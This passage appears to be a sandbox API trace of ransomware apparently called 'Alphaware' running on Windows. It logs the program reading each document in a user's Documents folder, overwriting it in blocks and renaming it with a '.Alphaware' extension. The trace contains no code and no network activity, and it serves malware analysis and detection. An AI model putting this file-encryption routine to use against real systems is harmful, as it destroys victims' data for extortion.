ftLastAccessTime.dwHighDateTime=0x1d97385, ftLastWriteTime.dwLowDateTime=0x83835ce0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xa1f4)) returned 1 [0082.733] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0082.733] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\D_cm4s7fP.pptx" (normalized: "c:\\users\\keecfmwgj\\documents\\d_cm4s7fp.pptx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\D_cm4s7fP.pptx.Alphaware" (normalized: "c:\\users\\keecfmwgj\\documents\\d_cm4s7fp.pptx.alphaware")) returned 1 [0082.734] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\gerLGhJ-J1Fq.xlsx", dwFileAttributes=0x80) returned 1 [0082.734] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0082.735] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\gerLGhJ-J1Fq.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\gerlghj-j1fq.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x2533bf0 | out: lpFileInformation=0x2533bf0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x503ed6f0, ftCreationTime.dwHighDateTime=0x1d943fe, ftLastAccessTime.dwLowDateTime=0x64756d00, ftLastAccessTime.dwHighDateTime=0x1d9701d, ftLastWriteTime.dwLowDateTime=0x64756d00, ftLastWriteTime.dwHighDateTime=0x1d9701d, nFileSizeHigh=0x0, nFileSizeLow=0xdc4c)) returned 1 [0082.735] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0082.735] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0082.735] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\gerLGhJ-J1Fq.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\gerlghj-j1fq.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0082.736] GetFileType (hFile=0x254) returned 0x1 [0082.736] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0082.736] GetFileType (hFile=0x254) returned 0x1 [0082.736] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23ec08 | out: lpFileSizeHigh=0x23ec08*=0x0) returned 0xdc4c [0082.736] ReadFile (in: hFile=0x254, lpBuffer=0x2533e48, nNumberOfBytesToRead=0xdc4c, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x2533e48*, lpNumberOfBytesRead=0x23eb38*=0xdc4c, lpOverlapped=0x0) returned 1 [0082.738] CloseHandle (hObject=0x254) returned 1 [0082.794] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0082.794] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\gerLGhJ-J1Fq.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\gerlghj-j1fq.xlsx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0082.796] GetFileType (hFile=0x254) returned 0x1 [0082.796] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0082.796] GetFileType (hFile=0x254) returned 0x1 [0082.801] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0082.801] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\gerLGhJ-J1Fq.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\gerlghj-j1fq.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x503ed6f0, ftCreationTime.dwHighDateTime=0x1d943fe, ftLastAccessTime.dwLowDateTime=0x64756d00, ftLastAccessTime.dwHighDateTime=0x1d9701d, ftLastWriteTime.dwLowDateTime=0x838ce260, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x12688)) returned 1 [0082.801] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0082.801] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\gerLGhJ-J1Fq.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\gerlghj-j1fq.xlsx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\gerLGhJ-J1Fq.xlsx.Alphaware" (normalized: "c:\\users\\keecfmwgj\\documents\\gerlghj-j1fq.xlsx.alphaware")) returned 1 [0082.802] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\GwoFAC.pdf", dwFileAttributes=0x80) returned 1 [0082.803] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0082.803] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\GwoFAC.pdf" (normalized: "c:\\users\\keecfmwgj\\documents\\gwofac.pdf"), fInfoLevelId=0x0, lpFileInformation=0x23eec80 | out: lpFileInformation=0x23eec80*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xc89b600, ftCreationTime.dwHighDateTime=0x1d97469, ftLastAccessTime.dwLowDateTime=0x8884feb0, ftLastAccessTime.dwHighDateTime=0x1d97485, ftLastWriteTime.dwLowDateTime=0x8884feb0, ftLastWriteTime.dwHighDateTime=0x1d97485, nFileSizeHigh=0x0, nFileSizeLow=0x6a24)) returned 1 [0082.803] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0082.804] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0082.804] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\GwoFAC.pdf" (normalized: "c:\\users\\keecfmwgj\\documents\\gwofac.pdf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0082.804] GetFileType (hFile=0x254) returned 0x1 [0082.804] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0082.804] GetFileType (hFile=0x254) returned 0x1 [0082.804] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23ec08 | out: lpFileSizeHigh=0x23ec08*=0x0) returned 0x6a24 [0082.805] ReadFile (in: hFile=0x254, lpBuffer=0x23eee98, nNumberOfBytesToRead=0x6a24, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x23eee98*, lpNumberOfBytesRead=0x23eb38*=0x6a24, lpOverlapped=0x0) returned 1 [0082.806] CloseHandle (hObject=0x254) returned 1 [0082.952] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\GwoFAC.pdf", nBufferLength=0x105, lpBuffer=0x23e4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\GwoFAC.pdf", lpFilePart=0x0) returned 0x27 [0082.952] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0082.953] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\GwoFAC.pdf" (normalized: "c:\\users\\keecfmwgj\\documents\\gwofac.pdf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0082.954] GetFileType (hFile=0x254) returned 0x1 [0082.955] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0082.955] GetFileType (hFile=0x254) returned 0x1 [0082.955] WriteFile (in: hFile=0x254, lpBuffer=0x24b6b70*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24b6b70*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0082.957] WriteFile (in: hFile=0x254, lpBuffer=0x24b6b70*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24b6b70*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0082.957] WriteFile (in: hFile=0x254, lpBuffer=0x24b6b70*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24b6b70*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0082.958] WriteFile (in: hFile=0x254, lpBuffer=0x24b6b70*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24b6b70*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0082.958] WriteFile (in: hFile=0x254, lpBuffer=0x24b6b70*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24b6b70*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0082.958] WriteFile (in: hFile=0x254, lpBuffer=0x24b6b70*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24b6b70*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0082.959] WriteFile (in: hFile=0x254, lpBuffer=0x24b6b70*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24b6b70*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0082.959] WriteFile (in: hFile=0x254, lpBuffer=0x24b6b70*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24b6b70*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0082.960] WriteFile (in: hFile=0x254, lpBuffer=0x24b6b70*, nNumberOfBytesToWrite=0xe60, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x24b6b70*, lpNumberOfBytesWritten=0x23e9f8*=0xe60, lpOverlapped=0x0) returned 1 [0082.971] CloseHandle (hObject=0x254) returned 1 [0082.974] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\GwoFAC.pdf", nBufferLength=0x105, lpBuffer=0x23e710, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\GwoFAC.pdf", lpFilePart=0x0) returned 0x27 [0082.974] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\GwoFAC.pdf.Alphaware", nBufferLength=0x105, lpBuffer=0x23e710, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\GwoFAC.pdf.Alphaware", lpFilePart=0x0) returned 0x31 [0082.974] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0082.974] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\GwoFAC.pdf" (normalized: "c:\\users\\keecfmwgj\\documents\\gwofac.pdf"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc89b600, ftCreationTime.dwHighDateTime=0x1d97469, ftLastAccessTime.dwLowDateTime=0x8884feb0, ftLastAccessTime.dwHighDateTime=0x1d97485, ftLastWriteTime.dwLowDateTime=0x83a71180, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x8e60)) returned 1 [0082.974] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0082.974] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\GwoFAC.pdf" (normalized: "c:\\users\\keecfmwgj\\documents\\gwofac.pdf"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\GwoFAC.pdf.Alphaware" (normalized: "c:\\users\\keecfmwgj\\documents\\gwofac.pdf.alphaware")) returned 1 [0082.978] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\hoG8.xlsx", nBufferLength=0x105, lpBuffer=0x23e7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\hoG8.xlsx", lpFilePart=0x0) returned 0x26 [0082.978] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\hoG8.xlsx", dwFileAttributes=0x80) returned 1 [0082.978] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0082.978] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\hoG8.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\hog8.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x24b7f48 | out: lpFileInformation=0x24b7f48*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x56d85d70, ftCreationTime.dwHighDateTime=0x1d96dec, ftLastAccessTime.dwLowDateTime=0x9c877e90, ftLastAccessTime.dwHighDateTime=0x1d96ee2, ftLastWriteTime.dwLowDateTime=0x9c877e90, ftLastWriteTime.dwHighDateTime=0x1d96ee2, nFileSizeHigh=0x0, nFileSizeLow=0x3ac3)) returned 1 [0082.978] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0082.979] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\hoG8.xlsx", nBufferLength=0x105, lpBuffer=0x23e570, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\hoG8.xlsx", lpFilePart=0x0) returned 0x26 [0082.979] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0082.979] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\hoG8.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\hog8.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0082.979] GetFileType (hFile=0x254) returned 0x1 [0082.979] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0082.979] GetFileType (hFile=0x254) returned 0x1 [0082.980] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23ec08 | out: lpFileSizeHigh=0x23ec08*=0x0) returned 0x3ac3 [0082.980] ReadFile (in: hFile=0x254, lpBuffer=0x24b8160, nNumberOfBytesToRead=0x3ac3, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x24b8160*, lpNumberOfBytesRead=0x23eb38*=0x3ac3, lpOverlapped=0x0) returned 1 [0082.981] CloseHandle (hObject=0x254) returned 1 [0083.039] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0083.039] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\hoG8.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\hog8.xlsx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0083.040] GetFileType (hFile=0x254) returned 0x1 [0083.040] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0083.041] GetFileType (hFile=0x254) returned 0x1 [0083.041] WriteFile (in: hFile=0x254, lpBuffer=0x255de68*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x255de68*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.042] WriteFile (in: hFile=0x254, lpBuffer=0x255de68*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x255de68*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.042] WriteFile (in: hFile=0x254, lpBuffer=0x255de68*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x255de68*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.043] WriteFile (in: hFile=0x254, lpBuffer=0x255de68*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x255de68*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0083.043] WriteFile (in: hFile=0x254, lpBuffer=0x255de68*, nNumberOfBytesToWrite=0xf34, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x255de68*, lpNumberOfBytesWritten=0x23e9f8*=0xf34, lpOverlapped=0x0) returned 1 [0083.043] CloseHandle (hObject=0x254) returned 1 [0083.045] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0083.045] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\hoG8.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\hog8.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56d85d70, ftCreationTime.dwHighDateTime=0x1d96dec, ftLastAccessTime.dwLowDateTime=0x9c877e90, ftLastAccessTime.dwHighDateTime=0x1d96ee2, ftLastWriteTime.dwLowDateTime=0x83b09700, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x4f34)) returned 1 [0083.045] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0083.045] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\hoG8.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\hog8.xlsx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\hoG8.xlsx.Alphaware" (normalized: "c:\\users\\keecfmwgj\\documents\\hog8.xlsx.alphaware")) returned 1 [0083.046] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\hTjop.xlsx", dwFileAttributes=0x80) returned 1 [0083.047] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0083.047] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\hTjop.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\htjop.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x255f258 | out: lpFileInformation=0x255f258*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xec285530, ftCreationTime.dwHighDateTime=0x1d916dd, ftLastAccessTime.dwLowDateTime=0x3c2aff40, ftLastAccessTime.dwHighDateTime=0x1d9405c, ftLastWriteTime.dwLowDateTime=0x3c2aff40, ftLastWriteTime.dwHighDateTime=0x1d9405c, nFileSizeHigh=0x0, nFileSizeLow=0xe176)) returned 1 [0083.047] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0083.047] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\hTjop.xlsx", nBufferLength=0x105, lpBuffer=0x23e570, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\hTjop.xlsx", lpFilePart=0x0) returned 0x27 [0083.047] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0083.047] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\hTjop.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\htjop.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0083.047] GetFileType (hFile=0x254) returned 0x1 [0083.047] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0083.048] GetFileType (hFile=0x254) returned 0x1 [0083.048] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23ec08 | out: lpFileSizeHigh=0x23ec08*=0x0) returned 0xe176 [0083.048] ReadFile (in: hFile=0x254, lpBuffer=0x255f470, nNumberOfBytesToRead=0xe176, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x255f470*, lpNumberOfBytesRead=0x23eb38*=0xe176, lpOverlapped=0x0) returned 1 [0083.049] CloseHandle (hObject=0x254) returned 1 [0083.090] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0083.090] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\hTjop.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\htjop.xlsx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0083.091] GetFileType (hFile=0x254) returned 0x1 [0083.091] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0083.091] GetFileType (hFile=0x254) returned 0x1 [0083.094] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0083.094] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\hTjop.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\htjop.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec285530, ftCreationTime.dwHighDateTime=0x1d916dd, ftLastAccessTime.dwLowDateTime=0x3c2aff40, ftLastAccessTime.dwHighDateTime=0x1d9405c, ftLastWriteTime.dwLowDateTime=0x83ba1c80, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x12d74)) returned 1 [0083.095] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0083.095] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\hTjop.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\htjop.xlsx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\hTjop.xlsx.Alphaware" (normalized: "c:\\users\\keecfmwgj\\documents\\htjop.xlsx.alphaware")) returned 1 [0083.096] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\i5YIwk0.pptx", dwFileAttributes=0x80) returned 1 [0083.096] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0083.096] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\i5YIwk0.pptx" (normalized: "c:\\users\\keecfmwgj\\documents\\i5yiwk0.pptx"), fInfoLevelId=0x0, lpFileInformation=0x2423738 | out: lpFileInformation=0x2423738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5f0e03c0, ftCreationTime.dwHighDateTime=0x1d95d6e, ftLastAccessTime.dwLowDateTime=0x32233aa0, ftLastAccessTime.dwHighDateTime=0x1d95ec8, ftLastWriteTime.dwLowDateTime=0x32233aa0, ftLastWriteTime.dwHighDateTime=0x1d95ec8, nFileSizeHigh=0x0, nFileSizeLow=0xc665)) returned 1 [0083.096] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0083.096] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0083.096] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\i5YIwk0.pptx" (normalized: "c:\\users\\keecfmwgj\\documents\\i5yiwk0.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0083.097] GetFileType (hFile=0x254) returned 0x1 [0083.097] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0083.097] GetFileType (hFile=0x254) returned 0x1 [0083.097] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23ec08 | out: lpFileSizeHigh=0x23ec08*=0x0) returned 0xc665 [0083.097] ReadFile (in: hFile=0x254, lpBuffer=0x2423970, nNumberOfBytesToRead=0xc665, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x2423970*, lpNumberOfBytesRead=0x23eb38*=0xc665, lpOverlapped=0x0) returned 1 [0083.098] CloseHandle (hObject=0x254) returned 1 [0083.124] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0083.124] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\i5YIwk0.pptx" (normalized: "c:\\users\\keecfmwgj\\documents\\i5yiwk0.pptx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0083.125] GetFileType (hFile=0x254) returned 0x1 [0083.125] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0083.125] GetFileType (hFile=0x254) returned 0x1 [0083.128] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0083.128] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\i5YIwk0.pptx" (normalized: "c:\\users\\keecfmwgj\\documents\\i5yiwk0.pptx"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f0e03c0, ftCreationTime.dwHighDateTime=0x1d95d6e, ftLastAccessTime.dwLowDateTime=0x32233aa0, ftLastAccessTime.dwHighDateTime=0x1d95ec8, ftLastWriteTime.dwLowDateTime=0x83bedf40, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x10960)) returned 1 [0083.128] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0083.128] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\i5YIwk0.pptx" (normalized: "c:\\users\\keecfmwgj\\documents\\i5yiwk0.pptx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\i5YIwk0.pptx.Alphaware" (normalized: "c:\\users\\keecfmwgj\\documents\\i5yiwk0.pptx.alphaware")) returned 1 [0083.129] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\J8xwAYmu3o.xls", dwFileAttributes=0x80) returned 1 [0083.129] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0083.129] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\J8xwAYmu3o.xls" (normalized: "c:\\users\\keecfmwgj\\documents\\j8xwaymu3o.xls"), fInfoLevelId=0x0, lpFileInformation=0x24d2e48 | out: lpFileInformation=0x24d2e48*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x1d178af0, ftCreationTime.dwHighDateTime=0x1d96de9, ftLastAccessTime.dwLowDateTime=0xe846b4c0, ftLastAccessTime.dwHighDateTime=0x1d9715f, ftLastWriteTime.dwLowDateTime=0xe846b4c0, ftLastWriteTime.dwHighDateTime=0x1d9715f, nFileSizeHigh=0x0, nFileSizeLow=0xa84d)) returned 1 [0083.130] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0083.130] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0083.130] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\J8xwAYmu3o.xls" (normalized: "c:\\users\\keecfmwgj\\documents\\j8xwaymu3o.xls"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0083.130] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0083.130] ReadFile (in: hFile=0x254, lpBuffer=0x24d3080, nNumberOfBytesToRead=0xa84d, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x24d3080*, lpNumberOfBytesRead=0x23eb38*=0xa84d, lpOverlapped=0x0) returned 1 [0083.157] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0083.157] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\J8xwAYmu3o.xls" (normalized: "c:\\users\\keecfmwgj\\documents\\j8xwaymu3o.xls"), 